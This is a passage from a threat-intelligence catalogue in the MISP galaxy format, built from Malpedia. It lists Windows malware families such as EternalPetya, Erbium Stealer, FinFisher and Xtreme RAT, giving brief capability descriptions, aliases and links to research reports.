
https://unit42.paloaltonetworks.com/atoms/obscureserpens/

https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.mandiant.com/media/12596/download

Emudbot

Supposedly a worm that was active around 2012-2013.

The tag is: misp-galaxy:malpedia="Emudbot"

Emudbot is also known as:

Table 3427. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.emudbot

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_emudbot.jp

Enigma Loader

According to Trend Micro, this is a downloader, dedicated to stage execution of a second stage malware called Enigma Stealer.

The tag is: misp-galaxy:malpedia="Enigma Loader"

Enigma Loader is also known as:

Table 3429. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.enigma_loader

https://www.trendmicro.com/en_us/research/23/b/enigma-stealer-targets-cryptocurrency-industry-with-fake-jobs.html

EntryShell

Fileless malware 'EntryShell', a variant of the KeyBoy malware, due to similarities in backdoor command IDs and debug messages with old KeyBoy samples. The embedded malware config was encrypted with a unique algorithm.

The tag is: misp-galaxy:malpedia="EntryShell"

EntryShell is also known as:

Table 3431. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.entryshell

https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload/

Epsilon Red

According to PCrisk, Epsilon is a ransomware-type program. This malware is designed to encrypt the data of infected systems in order to demand payment for decryption.

The tag is: misp-galaxy:malpedia="Epsilon Red"

Epsilon Red is also known as:

  • BlackCocaine

Table 3434. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.epsilon_red

https://news.sophos.com/en-us/2021/05/28/epsilonred/

https://cybleinc.com/2021/06/03/nucleus-software-becomes-victim-of-the-blackcocaine-ransomware/

https://therecord.media/epsilonred-ransomware-group-hits-one-of-indias-financial-software-powerhouses/

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

Erbium Stealer

Erbium is an information stealer advertised and sold as a Malware-as-a-Service on cybercrime forums and Telegram since at least July 2022. Its capabilities are those of a classic information stealer, with a focus on cryptocurrency wallets, and file grabber capabilities.

The tag is: misp-galaxy:malpedia="Erbium Stealer"

Erbium Stealer is also known as:

Table 3437. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.erbium_stealer

https://twitter.com/sekoia_io/status/1577222282929311744

https://twitter.com/abuse_ch/status/1565290110572175361

https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer

https://www.bleepingcomputer.com/news/security/new-erbium-password-stealing-malware-spreads-as-game-cracks-cheats/

Eredel

Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.

According to nulled[.]to:

Supported browsers Chromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.

  • Stealing FileZilla

  • Stealing an account from Telegram

  • Stealing AutoFill

  • Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin

  • Stealing files from the desktop. Supports any formats, configurable via telegram-bot

The tag is: misp-galaxy:malpedia="Eredel"

Eredel is also known as:

Table 3439. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel

https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:https://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab[https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:https://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab]

Erica Ransomware

The tag is: misp-galaxy:malpedia="Erica Ransomware"

Erica Ransomware is also known as:

Table 3440. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.erica_ransomware

https://www.dropbox.com/s/f4uulu2rhyj4leb/Girl.scr_malware_report.pdf?dl=0

Eris

Ransomware.

The tag is: misp-galaxy:malpedia="Eris"

Eris is also known as:

Table 3441. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eris

https://lekstu.ga/posts/go-under-the-hood-eris/

EternalRocks

The tag is: misp-galaxy:malpedia="EternalRocks"

EternalRocks is also known as:

  • MicroBotMassiveNet

Table 3443. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eternalrocks

https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

https://github.com/stamparm/EternalRocks

EternalPetya

According to proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit virus infections lock up victims’ computers, servers, or files preventing them from regaining access until a ransom—usually in Bitcoin—is paid.

The tag is: misp-galaxy:malpedia="EternalPetya"

EternalPetya is also known as:

  • BadRabbit

  • Diskcoder.C

  • ExPetr

  • NonPetya

  • NotPetya

  • Nyetya

  • Petna

  • Pnyetya

  • nPetya

Table 3444. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya

https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/

https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf

https://attack.mitre.org/groups/G0034

https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna

https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/

https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://medium.com/@Ilandu/petya-not-petya-ransomware-9619cbbb0786

https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/

https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back

https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/

https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/

https://securelist.com/bad-rabbit-ransomware/82851/

http://www.intezer.com/notpetya-returns-bad-rabbit/

https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/

https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too

https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine

https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/

https://istari-global.com/spotlight/the-untold-story-of-notpetya/

https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/

https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/

https://www.atlanticcouncil.org/content-series/tech-at-the-leading-edge/the-russian-cyber-unit-that-hacks-targets-on-site/

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/

https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer

https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html

https://securelist.com/from-blackenergy-to-expetr/78937/

https://securelist.com/in-expetrpetyas-shadow-fakecry-ransomware-wave-hits-ukraine/78973/

https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf

https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik

https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html

https://www.secureworks.com/research/threat-profiles/iron-viking

https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/

https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/

https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf

https://securelist.com/big-threats-using-code-similarity-part-1/97239/

https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html

http://blog.talosintelligence.com/2017/10/bad-rabbit.html

http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html

https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/

https://therecord.media/mondelez-and-zurich-reach-settlement-in-notpetya-cyberattack-insurance-suit/

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/

https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/

https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/

https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/

https://securelist.com/schroedingers-petya/78870/

https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/

https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games

https://www.riskiq.com/blog/labs/badrabbit/

https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks

https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/

https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/

https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html

https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware

https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://securelist.com/apt-trends-report-q2-2019/91897/

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://gvnshtn.com/maersk-me-notpetya/

https://securelist.com/apt-trends-report-q2-2020/97937/

https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html

https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/

https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b

EvilPlayout

A wiper used against in an attack against Iran’s state broadcaster. Using campaign name coined by Check Point in lack of a better name for the wiper component.

The tag is: misp-galaxy:malpedia="EvilPlayout"

EvilPlayout is also known as:

Table 3454. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.evilplayout

https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/

EvilPony

Privately modded version of the Pony stealer.

The tag is: misp-galaxy:malpedia="EvilPony"

EvilPony is also known as:

  • CREstealer

Table 3455. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony

https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/

ExByte

ExByte is a custom data exfiltration tool and infostealer observed being used during BlackByte ransomware attacks.

The tag is: misp-galaxy:malpedia="ExByte"

ExByte is also known as:

Table 3458. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.exbyte

https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware

Excalibur

The tag is: misp-galaxy:malpedia="Excalibur"

Excalibur is also known as:

  • Saber

  • Sabresac

Table 3459. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur

https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies

Exile RAT

ExileRAT is a simple RAT platform capable of getting information on the system (computer name, username, listing drives, network adapter, process name), getting/pushing files and executing/terminating processes.

The tag is: misp-galaxy:malpedia="Exile RAT"

Exile RAT is also known as:

Table 3461. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat

https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html

Exorcist

According to PCrisk, Exorcist is a ransomware-type malicious program. Systems infected with this malware experience data encryption and users receive ransom demands for decryption. During the encryption process, all compromised files are appended with an extension consisting of a ransom string of characters.

For example, a file originally named "1.jpg" could appear as something similar to "1.jpg.rnyZoV" following encryption. After this process is complete, Exorcist ransomware changes the desktop wallpaper and drops HTML applications - "[random-string]-decrypt.hta" (e.g. "rnyZoV-decrypt.hta") - into affected folders. These files contain identical ransom messages.

The tag is: misp-galaxy:malpedia="Exorcist"

Exorcist is also known as:

Table 3463. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.exorcist

https://medium.com/@velasco.l.n/exorcist-ransomware-from-triaging-to-deep-dive-5b7da4263d81

Expiro

Expiro malware has been around for more than a decade, and the malware authors sill continue their work and update it with more features. Also the infection routine was changed in samples fround in 2017 (described by McAfee). Expiro "infiltrates" executables on 32- and 64bit Windows OS versions. It has capabilities to install browser extensions, change security behaviour/settings on the infected system, and steal information (e.g. account credentials). There is a newly described EPO file infector source code called m0yv in 2022, which is wrongly identified as expiro by some AVs.

The tag is: misp-galaxy:malpedia="Expiro"

Expiro is also known as:

  • Xpiro

Table 3464. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.expiro

https://www.welivesecurity.com/2013/07/30/versatile-and-infectious-win64expiro-is-a-cross-platform-file-infector/

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Expiro

https://github.com/GiacomoFerro/malware-analysis/blob/master/report/report-malware.pdf

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/expiro-infects-encrypts-files-to-complicate-repair/

https://youtu.be/3RYbkORtFnk

https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d

ExplosiveRAT

The tag is: misp-galaxy:malpedia="ExplosiveRAT"

ExplosiveRAT is also known as:

Table 3465. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.explosive_rat

https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/

Xtreme RAT

According to Trend MIcro, Extreme RAT (XTRAT, Xtreme Rat) is a Remote Access Trojan that can steal information. This RAT has been used in attacks targeting Israeli and Syrian governments last 2012.

This malware family of backdoors has the capability to receive commands such as File Management (Download, Upload, and Execute Files), Registry Management (Add, Delete, Query, and Modify Registry), Perform Shell Command, Computer Control (Shutdown, Log on/off), and Screen capture from a remote attacker. In addition, it can also log keystrokes of the infected systems.

The tag is: misp-galaxy:malpedia="Xtreme RAT"

Xtreme RAT is also known as:

  • ExtRat

Table 3466. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat

https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017

https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/

https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html

https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1

https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat

https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g

https://blogs.360.cn/post/APT-C-44.html

https://www.secureworks.com/research/threat-profiles/aluminum-saratoga

https://citizenlab.ca/2015/12/packrat-report/

https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html

EYService

EYService is the main part of the backdoor used by Nazar APT. This a passive backdoor that relies on, now discontinued, Packet Sniffer SDK (PSSDK) from Microolap.

The tag is: misp-galaxy:malpedia="EYService"

EYService is also known as:

Table 3468. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice

https://blog.malwarelab.pl/posts/nazar_eyservice/

https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf

https://research.checkpoint.com/2020/nazar-spirits-of-the-past/

https://blog.malwarelab.pl/posts/nazar_eyservice_comm/

https://www.epicturla.com/blog/the-lost-nazar

FakeCry

Malware written in .NET that mimics WannaCry.

The tag is: misp-galaxy:malpedia="FakeCry"

FakeCry is also known as:

Table 3470. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fakecry

https://securelist.com/in-expetrpetyas-shadow-fakecry-ransomware-wave-hits-ukraine/78973/

fancyfilter

FancyFilter is a piece of code that documents code overlap between frameworks used by Regin and Equation Group.

The tag is: misp-galaxy:malpedia="fancyfilter"

fancyfilter is also known as:

  • 0xFancyFilter

Table 3474. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fancyfilter

https://www.epicturla.com/previous-works/hitb2020-voltron-sta

FantomCrypt

According to PCrisk, Fantom is a ransomware-type virus that imitates the Windows update procedure while encrypting files. This is unusual, since most ransomware encrypts files stealthily without showing any activity. During encryption, Fantom appends the names of encrypted files with the ".locked4", ".fantom" or ".locked" extension.

The tag is: misp-galaxy:malpedia="FantomCrypt"

FantomCrypt is also known as:

Table 3476. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt

https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/

FastLoader

FastLoader is a small .NET downloader, which name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of processes and uploads it together with screenshot(s). In more recent versions, it employs simple anti-analysis checks (VM detection) and comes with string obfuscations.

The tag is: misp-galaxy:malpedia="FastLoader"

FastLoader is also known as:

Table 3478. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader

FatalRat

According to PCrisk, FatalRAT is the name of a Remote Access Trojan (RAT). A RAT is a type of malware that allows the attacker to remotely control the infected computer and use it for various purposes.

Typically, RATs are used to access files and other data, watch computing activities on the screen and capture screenshots, steal sensitive information (e.g., login credentials, credit card details).

There are many legitimate remote administration/access tools on the Internet. It is common that cybercriminals use those tools with malicious intent too.

The tag is: misp-galaxy:malpedia="FatalRat"

FatalRat is also known as:

  • Sainbox RAT

Table 3480. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat

https://www.youtube.com/watch?v=gjvnVZc11Vg

https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html

https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape

https://cybersecurity.att.com/blogs/labs-research/new-sophisticated-rat-in-town-fatalrat-analysis

https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html

FatDuke

According to ESET Research, FatDuke is the current flagship backdoor of APT29 and is only deployed on the most interesting machines. It is generally dropped by the MiniDuke backdoor, but ESET also have seen the operators dropping FatDuke using lateral movement tools such as PsExec.The operators regularly repack this malware in order to evade detections. The most recent sample of FatDuke that ESET have seen was compiled on May 24, 2019. They have seen them trying to regain control of a machine multiple times in a few days, each time with a different sample. Their packer, described in a later section, adds a lot of code, leading to large binaries. While the effective code should not be larger than 1MB, ESET have seen one sample weighing in at 13MB, hence our name for this backdoor component: FatDuke.

The tag is: misp-galaxy:malpedia="FatDuke"

FatDuke is also known as:

Table 3481. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fatduke

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

https://www.secureworks.com/research/threat-profiles/iron-hemlock

FCT

Ransomware.

The tag is: misp-galaxy:malpedia="FCT"

FCT is also known as:

Table 3483. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fct

https://id-ransomware.blogspot.com/2020/02/fct-ransomware.html

fengine

The tag is: misp-galaxy:malpedia="fengine"

fengine is also known as:

Table 3487. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fengine

https://www.zscaler.jp/blogs/security-research/naver-ending-game-lazarus-apt

Feodo

Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials.

The tag is: misp-galaxy:malpedia="Feodo"

Feodo is also known as:

  • Bugat

  • Cridex

Table 3488. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo

https://feodotracker.abuse.ch/

http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html

http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html

https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/

https://en.wikipedia.org/wiki/Maksim_Yakubets

FFDroider

According to PCrisk, FFDroider is a malicious program classified as a stealer. It is designed to extract and exfiltrate sensitive data from infected devices. FFDroider targets popular social media and e-commerce platforms in particular.

The tag is: misp-galaxy:malpedia="FFDroider"

FFDroider is also known as:

Table 3489. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ffdroider

https://thehackernews.com/2022/04/researchers-warn-of-ffdroider-and.html

https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users

Ficker Stealer

According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we’ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.

The tag is: misp-galaxy:malpedia="Ficker Stealer"

Ficker Stealer is also known as:

Table 3490. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

https://blogs.blackberry.com/en/2021/08/threat-thursday-ficker-infostealer-malware

https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon

https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf

https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market

https://twitter.com/3xp0rtblog/status/1321209656774135810

https://www.bleepingcomputer.com/news/security/fake-microsoft-store-spotify-sites-spread-info-stealing-malware/

https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a

Filerase

Filerase is a .net API-based utility capable of propagating and recursively deleting files.

The tag is: misp-galaxy:malpedia="Filerase"

Filerase is also known as:

Table 3492. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.filerase

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail

Final1stSpy

The tag is: misp-galaxy:malpedia="Final1stSpy"

Final1stSpy is also known as:

Table 3493. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy

https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/

FinFisher RAT

FinFisher is a commercial software used to steal information and spy on affected victims. It began with few functionalities which included password harvesting and information leakage, but now it is mostly known for its full Remote Access Trojan (RAT) capabilities. It is mostly known for being used in governmental targeted and lawful criminal investigations. It is well known for its anti-detection capabilities and use of VMProtect.

The tag is: misp-galaxy:malpedia="FinFisher RAT"

FinFisher RAT is also known as:

  • FinSpy

Table 3495. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher

https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/

https://securelist.com/finspy-unseen-findings/104322/

https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-2-first-attempt-at-devirtualization

https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-4-second-attempt-at-devirtualization

https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2

https://netzpolitik.org/2022/nach-pfaendung-staatstrojaner-hersteller-finfisher-ist-geschlossen-und-bleibt-es-auch/

https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf

https://www.msreverseengineering.com/blog/2018/2/21/finspy-vm-unpacking-tutorial-part-3-devirtualization

https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html

https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/

https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html

https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html

https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/

https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/

https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-3-fixing-the-function-related-issues

https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/

https://github.com/RolfRolles/FinSpyVM

https://securelist.com/apt-trends-report-q2-2019/91897/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation

https://www.msreverseengineering.com/blog/2018/2/21/wsbjxrs1jjw7qi4trk9t3qy6hr7dye

FINTEAM

Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer. This is achieved by sideloading another DLL among the legit TeamViewer.

The tag is: misp-galaxy:malpedia="FINTEAM"

FINTEAM is also known as:

  • TeamBot

Table 3496. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.finteam

https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/

Fireball

The tag is: misp-galaxy:malpedia="Fireball"

Fireball is also known as:

Table 3497. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball

http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/

FireBird RAT

The tag is: misp-galaxy:malpedia="FireBird RAT"

FireBird RAT is also known as:

Table 3498. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.firebird_rat

https://twitter.com/casual_malware/status/1237775601035096064

Fire Chili

The purpose of this rootkit/driver is hiding and protecting malicious artifacts from user-mode components(e.g. files, processes, registry keys and network connections). According to Fortguard Labs, this malware uses Direct Kernel Object Modification (DKOM), which involves undocumented kernel structures and objects, for its operations, why this malware has to rely on specific OS builds.

The tag is: misp-galaxy:malpedia="Fire Chili"

Fire Chili is also known as:

Table 3499. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.firechili

https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits

https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html

FireCrypt

The tag is: misp-galaxy:malpedia="FireCrypt"

FireCrypt is also known as:

Table 3500. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt

https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/

FireMalv

The tag is: misp-galaxy:malpedia="FireMalv"

FireMalv is also known as:

Table 3501. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv

https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

FirstRansom

The tag is: misp-galaxy:malpedia="FirstRansom"

FirstRansom is also known as:

Table 3502. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom

https://twitter.com/JaromirHorejsi/status/815949909648150528

FiveHands

The tag is: misp-galaxy:malpedia="FiveHands"

FiveHands is also known as:

  • Thieflock

Table 3504. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fivehands

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-financially-motivated-aggressive-group-carrying-out-ransomware-campaigns-active-iocs

https://www.esentire.com/blog/hacker-infrastructure-used-in-cisco-breach-discovered-attacking-a-top-workforce-management-corporation-russias-evil-corp-gang-suspected-reports-esentire

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126b

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue

https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/

https://www.bleepingcomputer.com/news/security/yanluowang-ransomware-operation-matures-with-experienced-affiliates/

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

